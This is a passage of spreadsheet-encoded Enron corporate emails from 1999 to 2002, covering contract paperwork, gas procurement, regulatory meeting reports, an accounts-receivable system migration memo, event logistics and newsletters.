    <t xml:space="preserve">Anthony Campos says that he has not received the paperwork on this in order _x000D_
to change the agreement.  Has this actually happened and has the proper _x000D_
paperwork been received?_x000D_
_x000D_
Kim Theriot_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Tana Jones on 11/14/2000 03:31 PM_x000D_
To: Bob Bowen/HOU/ECT@ECT, Laurel Adams/HOU/ECT@ECT, Andrea R _x000D_
Guillen/HOU/ECT@ECT, Larry Joe Hunter/HOU/ECT@ECT, Gordon _x000D_
Heaney/Corp/Enron@ENRON, Janie Aguayo/HOU/ECT@ECT, Derek _x000D_
Bailey/Corp/Enron@ENRON, Diane Anderson/NA/Enron@Enron, Kevin _x000D_
Meredith/Corp/Enron@ENRON, Scott Tackett/Corp/Enron@Enron, Celeste _x000D_
Cisneros/NA/Enron@Enron, Dianne Seib/CAL/ECT@ECT, Melissa Ann _x000D_
Murphy/HOU/ECT@ECT, Tiffany Williams/NA/Enron@Enron, Kim S _x000D_
Theriot/HOU/ECT@ECT, William S Bradford/HOU/ECT@ECT, Debbie R _x000D_
Brackett/HOU/ECT@ECT, Tanya Rohauer/HOU/ECT@ECT, Brant Reves/HOU/ECT@ECT, _x000D_
Tracy Ngo/PDX/ECT@ECT, Lesli Campbell/HOU/ECT@ECT, Veronica _x000D_
Espinoza/Corp/Enron@ENRON, Paul Radous/Corp/Enron@ENRON, Wendi _x000D_
LeBrocq/Corp/Enron@Enron, Russell Diamond/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, _x000D_
Edward Sacks/Corp/Enron@Enron, Nidia Mendoza/HOU/ECT@ECT, Bradley _x000D_
Diebner/HOU/ECT@ECT, Brent Hendry/NA/Enron@Enron, Sara _x000D_
Shackleton/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Carol St Clair/HOU/ECT@ECT, _x000D_
Susan Bailey/HOU/ECT@ECT, Mary Cook/HOU/ECT@ECT, Samantha _x000D_
Boyd/NA/Enron@Enron, Robert Bruce/NA/Enron@Enron, Stephanie _x000D_
Panus/NA/Enron@Enron, Marilyn Colbert/HOU/ECT@ECT, Diane _x000D_
Ellstrom/HOU/ECT@ECT, Lynn E Shivers/HOU/ECT@ECT, Bill D Hare/HOU/ECT@ect, _x000D_
Leslie Reeves/HOU/ECT@ECT, Jason Moore/HOU/ECT@ECT, Dianne Seib/CAL/ECT@ECT, _x000D_
Samuel Schott/HOU/ECT@ECT, Anthony Campos/HOU/ECT@ECT, Bernice _x000D_
Rodriguez/HOU/ECT@ECT, Mary G Gosnell/HOU/ECT@ECT, Dale Neuner/HOU/ECT@ECT, _x000D_
Karen Lambert/HOU/ECT@ECT, Frank L Davis/HOU/ECT@ECT, Carrie _x000D_
Southard/LON/ECT@ECT, Amber Ebow/HOU/ECT@ECT, Adnan Patel/Corp/Enron@ENRON, _x000D_
Melissa Ann Murphy/HOU/ECT@ECT, Stacey Richardson/HOU/ECT@ECT, Bridgette _x000D_
Anderson/Corp/Enron@ENRON, Lisa Lees/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Calpine Power Services, Inc._x000D_
_x000D_
Pursuant to the Certificate of Merger filed with the Delaware Secretary of _x000D_
State effective 11/1/00, Calpine Power Services Company, a California _x000D_
corporation has been merged with and into Calpine Energy Services, L.P., a _x000D_
Delaware corporation.  The ISDA Master Agreement with Calpine Power Services _x000D_
Company dated 10/20/99 will be changed accordingly._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Sep 2001 14:52:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron Sales to Core Procurement</t>
  </si>
  <si>
    <t>Jeff - I'm told by our core procurement people that Enron has refused to_x000D_
enter into any term gas contracts for this winter because of problems they_x000D_
have with us on the electric side.  Personally, that makes no sense to me._x000D_
We have the PUC's security order that guarantees payment and Judge Montali_x000D_
has made it clear that he will approve the payment on all gas contracts.  It_x000D_
seems to me that if this is true, Enron is really screwing itself - which is_x000D_
no the way Enron typically does business. Can you check with your people ?_x000D_
We are now in the process of finalizing our needs for the winter.</t>
  </si>
  <si>
    <t>Thu, 5 Oct 2000 00:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Bazor Contract Confirmation</t>
  </si>
  <si>
    <t xml:space="preserve">It may be time for a drink!!_x000D_
_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Stacy E Dickson on 10/04/2000 04:33 PM_x000D_
To: Susan W Pereira/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Bazor Contract Confirmation  _x000D_
_x000D_
No problem.  What will we do when this thing is finally signed?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 03:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>another quick question</t>
  </si>
  <si>
    <t>Tana, would you please let us know the location of the ISDA folders _x000D_
referenced in Limor's attached e-mail?  _x000D_
Thanks,_x000D_
Laurie _x000D_
----- Forwarded by Laurie Mayer/HOU/ECT on 04/11/2001 10:25 AM -----_x000D_
_x000D_
	Limor Nissan@MGUSA_x000D_
	04/11/2001 09:40 AM_x000D_
		 _x000D_
		 To: Laurie Mayer/HOU/ECT@ECT, Nony Flores/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: another quick question_x000D_
_x000D_
Hey guys,_x000D_
_x000D_
I'm in the process of getting authorized to access files in the O drive, and _x000D_
need to confirm which folders are ones that I would need.  The one labeled _x000D_
Legal seems appropriate.  Also, I understood from Alan that there is a folder _x000D_
with scanned in ISDA Masters that I need.   The thing of it is that I don't _x000D_
know what's in any of the folders, so it's hard to figure which ones I should _x000D_
get authorized for._x000D_
_x000D_
If you guys could help me identify which ones they are, that would be great._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Limor_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
520 Madison Avenue_x000D_
New York, NY 10022_x000D_
Tel: 212-715-5283_x000D_
Fax: 212-715-5608_x000D_
Email: Limor.Nissan@Enron.com</t>
  </si>
  <si>
    <t>Wed, 30 Aug 2000 04:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'mary.hain@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'christi.nicolay@enron.com', 'donna.fulton@enron.com'})</t>
  </si>
  <si>
    <t>EPSA Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry -- This apparently was not recieved by everyone.  Thanks JOE_x000D_
---------------------- Forwarded by Joe Hartsoe/Corp/Enron on 08/30/2000 _x000D_
12:01 PM ---------------------------_x000D_
_x000D_
_x000D_
Joe Hartsoe_x000D_
08/30/2000 08:48 AM_x000D_
To: James D Steffes/HOU/EES@EES, Sarah Novosel/Corp/Enron@ENRON, Christi L _x000D_
Nicolay/HOU/ECT@ECT, Donna Fulton/Corp/Enron@ENRON, Mary Hain/HOU/ECT@ECT, _x000D_
Jeff Dasovich/SFO/EES@EES_x000D_
cc: Richard Shapiro/HOU/EES@EES, Steven J Kean/NA/Enron@Enron, Joe _x000D_
Hartsoe/Corp/Enron@ENRON _x000D_
_x000D_
Subject: EPSA Meeting_x000D_
_x000D_
The EPSA meeting in Chicago was successful.  In addition to numerous _x000D_
stakeholders, the press was there in full force. It became clear that _x000D_
deregulation is not complete, and that the problem is not deregulation -- but _x000D_
continuing unnecessary regulation. _x000D_
    _x000D_
Commissioner Massey's speech on why competition is necessary was actually _x000D_
quite good.  His message is approximately 90 percent consistent with Enron's _x000D_
on the wholesale level (He even called for Federal siting authority.).  He _x000D_
sees price caps as a stop gap only and votes for them as a last resort.  _x000D_
However, he still contradicts himself when he questions the use of single _x000D_
price auctions because they do not work as intended; but, he comments that _x000D_
PJM is working.  I and others will work with him to make sure he _x000D_
understands.  _x000D_
_x000D_
I spent time with Mike McLaughlin (Director of Corporate Applications) and _x000D_
Rob Cupina (Director of Rates, Central).  We spoke about the RTO filings due _x000D_
October 15.  I shared my concern that some of the RTO filings may be _x000D_
incomplete and asked what actions FERC may take if the filings are _x000D_
deficient.  Mike indicated that the RTO filings will be processed by the rate _x000D_
offices of the three regions (east, central and west) in Dan Larcamp's group _x000D_
(OMTR).  He believes that Order 2000 will become as "voluntary" as Order 436 _x000D_
was._x000D_
_x000D_
If you would like to discuss or have particular questions, please do not _x000D_
hesitate to call -- 202.466.9150  JOE  _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 3 May 2001 01:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jonathan.pershing@iea.org'})</t>
  </si>
  <si>
    <t>Re: for Rosalee - re Mr. Lay's participation at IEA ministerial</t>
  </si>
  <si>
    <t xml:space="preserve">Mr. Pershing, I am still confused about the exact date of the panel!!_x000D_
_x000D_
Rosalee_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"PERSHING Jonathan, IEA/LTO" &lt;Jonathan.PERSHING@iea.org&gt; on 05/03/2001 _x000D_
08:00:41 AM_x000D_
To: "'Kenneth.Lay@enron.com'" &lt;Kenneth.Lay@enron.com&gt;_x000D_
cc:  _x000D_
Subject: for Rosalee - re Mr. Lay's participation at IEA ministerial_x000D_
_x000D_
_x000D_
Rosalee -- I just wanted to follow up to see if there are any further_x000D_
questions you (or Mr Lay) have had with regard to the OECD FORUM and IEA_x000D_
Ministerial sessions scheduled for 15-16 May here in Paris.  The schedule is_x000D_
as I sent it to you in April -- although there may be some changes with the_x000D_
events at the Ministerial dinner.  Here, while we are still intending that_x000D_
Mr. Lay provide a summary of the FORUM session to the ministerial_x000D_
participants, we may need to re-order the dinner agenda slightly to_x000D_
accommodate Secretary Abraham's schedule.  We will keep you posted._x000D_
_x000D_
I would also appreciate receiving a copy of the CV that you sent to the OECD_x000D_
for our own files; we are trying to compile a full set of all participants_x000D_
for use during the sessions._x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
Best wishes,_x000D_
_x000D_
Jonathan Pershing_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 13:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Jeff, ETS Operations would be glad to look at these and any other _x000D_
"potential" opportunity to operate 3rd party facilities. Don Hawkins is _x000D_
heading up the "endless possibilities" for us. I did copy him on this reply, _x000D_
Don is based in Houston. _x000D_
_x000D_
I 'am currently in Amarillo Texas with the SW Operation Directors and I will _x000D_
discuss this with Rich._x000D_
_x000D_
THANKS for the partnership._x000D_
R2_x000D_
_x000D_
_x000D_
_x000D_
	Jeffery Fawcett_x000D_
	11/27/2000 04:00 PM_x000D_
		 _x000D_
		 To: Randy Rice/OTS/Enron@ENRON, Rich Jolly/ET&amp;S/Enron@ENRON_x000D_
		 cc: Susan Scott/ET&amp;S/Enron@ENRON, Steven Harris/ET&amp;S/Enron@ENRON, Kevin _x000D_
Hyatt/ET&amp;S/Enron@Enron, Mary Kay Miller/ET&amp;S/Enron@ENRON, Drew _x000D_
Fossum/ET&amp;S/Enron@ENRON, Julia White/ET&amp;S/Enron@ENRON_x000D_
		 Subject: Citizens request for proposal_x000D_
_x000D_
Citizens Utilities is in the process of selling off all of its _x000D_
non-telecommunications businesses throughout North America.  One of their _x000D_
principal assets, Louisiana Gas Service (LGS) is one of those companies _x000D_
recently sold by Citizens.  LGS provided gas control and operations services _x000D_
to other non-LGS companies, including the Citizens Utilities LDC assets in _x000D_
Arizona.  With the consummation of the sale of LGS, Citizens has told me _x000D_
confidentially that they have no reasonable way of operating the _x000D_
interconnect, metering and 1.5 mile lateral pipeline facilities that _x000D_
interconnects TW and EPNG to the recently constructed Griffith Energy Power _x000D_
Plant.   Therefore, Citizens is looking to possibly have a 3rd party provide _x000D_
contract operations services under an operating agreement.  TW has been asked _x000D_
in writing by Citizens to consider making a proposal to operate these _x000D_
facilities. _x000D_
_x000D_
Does TW have an interest in providing contract operations services for _x000D_
Citizens?  In a related legal/regulatory question, does TW have the authority _x000D_
to conduct contract services on behalf of others, or would we have to perform _x000D_
these services as a separate legal entity?  If we do, does this present an _x000D_
affiliate problem for us if we "share" operating employees?  If these _x000D_
threshold questions can be accommodated, and TW is not only able to provide _x000D_
contract operations services for Citizens, but has a commercial desire to do _x000D_
so, what would we charge Citizens for this service?  Although it would appear _x000D_
at first blush to be a relatively simple matter to operate these facilities, _x000D_
remember that Citizens will be receiving gas (potentially) from both TW and _x000D_
EPNG simultaneously, presenting not only a challenge to balance pressure _x000D_
between the pipes, but to account for and reconcile deliveries and receipts _x000D_
from both pipes as well as the plant site. _x000D_
_x000D_
Although I'm the principal commercial representative for Citizens as regards _x000D_
transportation matters, I'm certainly willing to step out of the middle of _x000D_
this negotiation if Operations desires to handle it themselves.  I will be _x000D_
happy to provide you a copy of the brief 1/2 page letter Citizens sent to me _x000D_
on the 17th soliciting TW's interest.   Given the relatively short lead time _x000D_
until LGS operations is sold, Citizens has requested expedited _x000D_
consideration.  Please let me know how you want to proceed.  Call if you have _x000D_
any questions._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 12 Dec 2001 13:05:27 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'americassociety@as-coa.org'})</t>
  </si>
  <si>
    <t>Mario Vargas Llosa lecture:  Save the Date!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Mario Vargas Llosa inaugurates David Rockefeller New Initiatives Endowment_x000D_
_x000D_
 - Mario Vargas Llosa.doc </t>
  </si>
  <si>
    <t>Tue, 5 Feb 2002 13:34:34 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Jill do you know what they need?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Swerzbin, Mike  _x000D_
Sent:	Monday, February 04, 2002 1:13 PM_x000D_
To:	'enron_update@concureworkplace.com'_x000D_
Subject:	_x000D_
_x000D_
Report ID no. 2B266B6655BD4CEFA874_x000D_
_x000D_
I don't think there are any receipts outstanding .. Could you please tell me which ones you're missing???  This last report had a receipt for everything._x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: enron_update@concureworkplace.com_x000D_
[mailto:enron_update@concureworkplace.com]_x000D_
Sent: Thursday, January 31, 2002 9:36 PM_x000D_
To: Swerzbin, Mike_x000D_
Subject: Expense Report Receipts Not Received_x000D_
_x000D_
_x000D_
Employee Name: Michael Swerzbin_x000D_
Report Name:   Swerzbin, Mike  1/17/02_x000D_
Report Date:   1/17/2002_x000D_
Purpose:       Trip to Houston, TX, Meeting w/ UBS Warburg Management_x000D_
Report ID:     2B266B6655BD4CEFA874_x000D_
Submitted On:  1/17/2002_x000D_
Report Total:  2112.45_x000D_
_x000D_
You are only allowed 2 reports with receipts outstanding.  Your expense reports will not be paid until you meet this requirement._x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 02:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Missing pieces</t>
  </si>
  <si>
    <t>Would you mind faxing me the schedules you emailed me last week?  713 973 _x000D_
0287.  I'm not hooked up to my printer, and it isn't working so swift, and I _x000D_
would like to be able to look at everything at one time._x000D_
_x000D_
Muchas gracias,_x000D_
_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Fri, 31 Mar 2000 04:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Follow-up</t>
  </si>
  <si>
    <t xml:space="preserve">No.  Thanks again!  DF_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jean McFarland                           03/31/2000 09:36 AM_x000D_
	_x000D_
_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Follow-up_x000D_
_x000D_
Drew -- did you have any problems with your laptop last night?  JM_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 00:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Fundamental Newsletters</t>
  </si>
  <si>
    <t xml:space="preserve">Are you on this distribution?  If not, please get on it. _x000D_
---------------------- Forwarded by Jeffrey A Shankman/HOU/ECT on 01/19/2001 _x000D_
08:50 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Amanda Huble @ ENRON                           01/19/2001 07:57 AM_x000D_
	_x000D_
_x000D_
To: Fletcher J Sturm/HOU/ECT@ECT, John J Lavorato/Corp/Enron@Enron, Richard _x000D_
Tomaski/Corp/Enron@Enron, Laura Luce/Corp/Enron@Enron, Julie A _x000D_
Gomez/HOU/ECT@ECT, Frank W Vickers/NA/Enron@Enron, Jonathan _x000D_
McKay/CAL/ECT@ECT, Tim Heizenrader/PDX/ECT@ECT, Jeffrey A _x000D_
Shankman/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Fundamental Newsletters_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 27 Oct 1999 09:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gary.peng@enron.com'})</t>
  </si>
  <si>
    <t>Re: 10-Q Litigation and Contingency Disclosure</t>
  </si>
  <si>
    <t>I have no changes</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 08:46:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>Structure Your Power Project Effectively</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;http://www.cbinet.com/confinfo/logos/0000689547.jpg&gt;_x000D_
KBC Bank _x000D_
_x000D_
  _x000D_
_x000D_
October 19, 2001                                                                                                                                       _x000D_
_x000D_
Dear Mr Steven Kean Esq: _x000D_
_x000D_
  _x000D_
_x000D_
            Lions. tigers and bears and another conference . . . oh no!  WAIT - don't be like me and just put this one with all the other junk e-mail you receive and we know where that goes.  Take a look and see what's in store for us this year at CBI's 3rd Annual Financing US Projects Conference.  Believe me, I know what you are thinking.  Several conference brochures come across my desk every day and admittedly I have seen and heard too many of the same people speak about the same thing.  CBI, however, always seems to be able to bring something new and interesting each time they organize this conference.  Last year was a great success.  If you didn't make it last year, come see what you have been missing.  If you did, come back and hear and explore some of the latest developments in financing power projects. _x000D_
_x000D_
Before assembling their agenda, the Center for Business Intelligence makes a concerted effort to speak with professionals in our industry to ensure that the most popular topics and issues are addressed so that people like you and me can do our business better.  This year, CBI has assembled an excellent round of speakers who are experts in their fields and who will provide you with a first hand view of their experiences._x000D_
_x000D_
            Besides being an excellent networking opportunity, CBI's 3rd Annual Financing US Projects is assured to provide you with an opportunity to get an update on many interesting areas of financing power projects from both a debt and equity perspective. Join your colleagues at an event, which could once again be one of the most informative conferences of the year. _x000D_
_x000D_
            In a market like today, one cannot miss a conference like this!  This year's conference takes place in New York City on November 15-16, 2001.  What better way to round out the year and support a city struck by tragedy to emerge and lead our us all into a political and economic victory.  I hope you can join me and all of your other colleagues, bankers and consultants so that we can all share our views and experiences in a market, which appears to have no boundaries for creativity.  For more information or to register, call CBI toll free at 800-817-8601 (781-939-2438 outside the U.S.), e-mail cbireg@cbinet.com &lt;mailto:cbireg@cbinet.com&gt;, or visit &lt;http://www.cbinet.com/&gt;.  Hope to see you there! _x000D_
_x000D_
Sincerely, _x000D_
_x000D_
Eric L. McCartney _x000D_
Head of Project Finance - the Americas _x000D_
_x000D_
P.S.      This e-mail entitles you to a $300.00 discount off the conference registration fee.  Please call CBI at 800-817-8601 (781-939-2438 outside the U.S.), e-mail cbireg@cbinet.com &lt;mailto:cbireg@cbinet.com&gt;, or visit us at http://www.cbinet.com. Please mention your Priority Code, PB167KBCEM.  (This is not to be combined with any other offer or discount and is for new registrations only.  Not valid for workshop only registrations).       _x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
If you received this e-mail in error or would like to be removed, PLEASE CLICK HERE &lt;mailto:cbi_mail@cbinet.com?subject=RemoveME 0000921259&gt;_x000D_
_x000D_
0000921259 </t>
  </si>
  <si>
    <t>Wed, 19 Apr 2000 06:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Unify AR -- SAP Plans</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  Here it is.  I think this might do it.  It would at least set the stage _x000D_
for any further discussion that might be necessary._x000D_
_x000D_
Stephen_x000D_
---------------------- Forwarded by Stephen P Schwarz/HOU/ECT on 04/19/2000 _x000D_
12:59 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Stephen P Schwarz                           02/29/2000 03:13 PM_x000D_
	_x000D_
_x000D_
To: Sally Beck/HOU/ECT@ECT, Inja Chun/HOU/ECT@ECT, Pamela _x000D_
Lebrane/Corp/Enron@ENRON, Melissa White/HOU/ECT@ECT, Leslie _x000D_
Reeves/HOU/ECT@ECT, Susan Harrison/HOU/ECT@ECT, Brenda F Herod/HOU/ECT@ECT, _x000D_
Bryce Baxter/HOU/ECT@ECT, Lisa Csikos/HOU/ECT@ECT, Rita Wynne/HOU/ECT@ECT, _x000D_
Bob Klein/HOU/ECT@ECT, Evelyn Aucoin/HOU/ECT@ECT, Cynthia _x000D_
Morrow/Corp/Enron@ENRON, Regan M Smith/HOU/ECT@ECT, Kenneth M _x000D_
Harmon/HOU/ECT@ECT, Brent A Price/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Unify AR -- SAP Plans_x000D_
_x000D_
The attached memo details our proposal of a week ago to use SAP AR rather _x000D_
than Unify AR.  As of this morning, we finalized our decision to use the SAP _x000D_
AR system and to turn off Unify AR when SAP is implemented.  Please direct _x000D_
any questions to myself at X33179 or Melissa White at X35704._x000D_
_x000D_
Please feel free to forward this memo to anyone I may have forgotten who is _x000D_
interested._x000D_
_x000D_
Stephen_x000D_
---------------------- Forwarded by Stephen P Schwarz/HOU/ECT on 02/29/2000 _x000D_
01:15 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Stephen P Schwarz                           02/18/2000 04:17 PM_x000D_
	_x000D_
_x000D_
To: Bryce Baxter/HOU/ECT@ECT, Lisa Csikos/HOU/ECT@ECT, Rita _x000D_
Wynne/HOU/ECT@ECT, Mechelle Stevens/HOU/ECT@ECT, Susan Harrison/HOU/ECT@ECT, _x000D_
Brenda F Herod/HOU/ECT@ECT, Brent A Price/HOU/ECT@ECT, Melissa K _x000D_
Ratnala/HOU/ECT@ECT, Leslie Reeves@CCMAIL, Evelyn Aucoin/HOU/ECT@ECT, Laura E _x000D_
Scott/CAL/ECT@ECT, Cheryl Dawes/CAL/ECT@ECT_x000D_
cc: Melissa White/HOU/ECT@ECT, Dorothy Ricketts/HOU/ECT@ECT, Kimberly _x000D_
Perkins/HOU/ECT@ECT, Trang Le/HOU/ECT@ECT, Christy Sweeney/HOU/ECT@ECT _x000D_
Subject: Unify AR -- SAP Plans_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
Two years ago Enron North America made a decision to use Unify AR for cash _x000D_
application rather than SAP AR.  We decided at the time that SAP AR would be _x000D_
kept in sync with Unify AR by the Unify/SAP interface.  We believe that the _x000D_
business logic for that decision has changed, and are now recommending that _x000D_
Unify AR be permanently turned off and all AR functions be performed in SAP.  _x000D_
I have briefly summarized the change in business situation below._x000D_
_x000D_
Two Years Ago	Today_x000D_
Netting allowed by legal and credit ONLY if netting contract was already in _x000D_
place.	Netting encouraged by legal and credit wherever possible, regardless of _x000D_
existence of signed agreement._x000D_
Netting limited to one counterparty and legal entity at a time.	Canada nets across _x000D_
counterparties._x000D_
Netting performed in physical only, financial settlements to maintain _x000D_
separate net statement process.	ENA considering netting physical and financial _x000D_
together._x000D_
All account coordinators were to apply their own cash.	Cash applied centrally in _x000D_
Power, Financial and Canada  Individual coordinators apply cash only in _x000D_
physical Gas._x000D_
Cash was to be applied at the line item level to track variances and to _x000D_
facilitate calculation of cost of funds by commercial team.	Although gas _x000D_
settlements is applying cash for some invoices at the line item level, this _x000D_
functionality is not being used by power settlements and will not be used by _x000D_
financial settlements.  The company has not made any move towards calculating _x000D_
cost of funds by commercial team._x000D_
The Account Inquiry functionality in Unify was thought to be a key on-line _x000D_
tool.	Old habits die hard...most users appear to be printing reports and reviewing _x000D_
data, rather than using the on-line functionality._x000D_
Overapplication of cash was not to be allowed.  Overpayments would be _x000D_
classified as "on account", with issues tracked in a case management system.	Case _x000D_
management system does not exist.  Allowing overapplication helps the account _x000D_
coordinators track overpayments easier than leaving cash on account._x000D_
The counterparty/legal entity combination on the deposit needed to match the _x000D_
counterparty/legal entity combination on the Enron invoice.	Given the number of legal _x000D_
entities Enron has, along with the number of entities our counterparties _x000D_
have, this seems like a hopeless battle.  Allowing cross-application of cash _x000D_
seems easier._x000D_
Corp required that intercompany settlements had to be "settled" with cash _x000D_
movement.	Corp no longer requires intercompany settlements to be "settled" with cash _x000D_
movement._x000D_
_x000D_
Converting to SAP AR simplifies the Unify/SAP interface in the following ways:_x000D_
Bank deposits into SAP do not have to be split off into Unify_x000D_
Cash entries in Unify do not have to be interfaced back to SAP_x000D_
Unify netting entries do not have to be interfaced to SAP_x000D_
Payables information does not have to be interfaced from SAP to Unify_x000D_
_x000D_
Given the change in attitudes towards our netting business process we face _x000D_
two problems in Unify.  _x000D_
Controls built into Unify are already obsolete._x000D_
Unify does not maintain all products in one database, making efforts to net _x000D_
across products in the future (physical with financial, for instance) _x000D_
impossible._x000D_
_x000D_
Our understanding of the netting process in SAP indicates that there are no _x000D_
controls (which sounds good at this point) and that we would retain the _x000D_
automatic netting entries when the payable is netted with the receivable _x000D_
within SAP.  However, we emphasize that netting would be done in SAP, not at _x000D_
the time of finaling a payment in Unify._x000D_
_x000D_
To repeat, we are recommending that Unify AR be turned off and we convert to _x000D_
SAP AR.  We will schedule a meeting the week of February 22 to discuss.  _x000D_
Please call me at X33179 with any questions or comments.  We WILL make this _x000D_
decision by February 28 because the SAP timeline does not allow any _x000D_
additional time for consideration._x000D_
_x000D_
Stephen_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 00:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Tomorrow's meeting</t>
  </si>
  <si>
    <t xml:space="preserve">No problem_x000D_
_x000D_
_x000D_
_x000D_
	&lt;Suzanne_Nimocks@mckinsey.com&gt;_x000D_
	12/07/2000 02:18 PM_x000D_
		 _x000D_
		 To: skean@enron.com_x000D_
		 cc: _x000D_
		 Subject: Tomorrow's meeting_x000D_
_x000D_
I realized that we'll have quite a few people there tomorrow: Rick, Mary ,_x000D_
Jeff,  you, me, Jon.  Do you have a problem if Dan comes too, or would you_x000D_
rather not._x000D_
_x000D_
+-------------------------------------------------------------+_x000D_
| This message may contain confidential and/or privileged     |_x000D_
| information.  If you are not the addressee or authorized to |_x000D_
| receive this for the addressee, you must not use, copy,     |_x000D_
| disclose or take any action based on this message or any    |_x000D_
| information herein.  If you have received this message in   |_x000D_
| error, please advise the sender immediately by reply e-mail |_x000D_
| and delete this message.  Thank you for your cooperation.   |_x000D_
+-------------------------------------------------------------+_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 12:46:58 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'technologydaily-alert@nationaljournal.com'})</t>
  </si>
  <si>
    <t>Technology Daily PM: Clarke Outlines Cyber-Security Goals</t>
  </si>
  <si>
    <t>_x000D_
----------------------------------------------------------------------------_x000D_
NATIONAL JOURNAL'S TECHNOLOGY DAILY PM EDITION _x000D_
is now available at http://nationaljournal.com/pubs/techdaily/_x000D_
----------------------------------------------------------------------------_x000D_
_x000D_
AFTERNOON HIGHLIGHTS:_x000D_
_x000D_
WHITE HOUSE: Cyber-security adviser Richard Clarke listed the creation of_x000D_
an early-warning network for cyber attacks among his priorities._x000D_
_x000D_
WHITE HOUSE: Richard Clarke hopes to revive a plan for tracking patterns of_x000D_
computer activity and intrusions at all government agencies._x000D_
_x000D_
BROADBAND: The prospects for a House vote on a bill to spur the rollout of_x000D_
high-speed Internet services remain in doubt._x000D_
_x000D_
COURTS: An Internet filtering law set for Supreme Court review has not_x000D_
aroused the protests that greeted a related law the court overturned in 1997._x000D_
_x000D_
_x000D_
TECH DAILY AFTERNOON FEATURE:_x000D_
Issue of the Week: Senior Writer Teri Rucker looks at the uncertainty that_x000D_
surrounded the Senate vote on the Internet tax moratorium._x000D_
Click here to go directly to the feature -_x000D_
http://nationaljournal.com/pubs/techdaily/features/issues/issu011126.htm_x000D_
_x000D_
_x000D_
TODAY ON NATIONALJOURNAL.COM:_x000D_
-- DAYBOOK: What's Ahead This Week_x000D_
   http://nationaljournal.com/members/calendar/_x000D_
_x000D_
-- POLL TRACK: Opinion Archives On Key Issues And Campaign 2002_x000D_
   http://nationaljournal.com/members/polltrack/_x000D_
_x000D_
_x000D_
----------------------------_x000D_
To stop receiving these E-mail Alerts:_x000D_
_x000D_
Reply to this message and include the word "unsubscribe" (without quotes)_x000D_
in the BODY of the message. _x000D_
----------------------------_x000D_
_x000D_
_x000D_
National Journal's Technology Daily is published daily by National Journal_x000D_
Group Inc. For more information about National Journal Group's_x000D_
publications, go to http://www.nationaljournal.com.</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 10:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: estimating tail of distribution and additional risk measures</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/06/2001 _x000D_
05:56 PM ---------------------------_x000D_
_x000D_
_x000D_
Tanya Tamarchenko_x000D_
03/21/2001 09:58 AM_x000D_
To: Naveen Andrews/Corp/Enron_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, David Port/Market Risk/Corp/Enron _x000D_
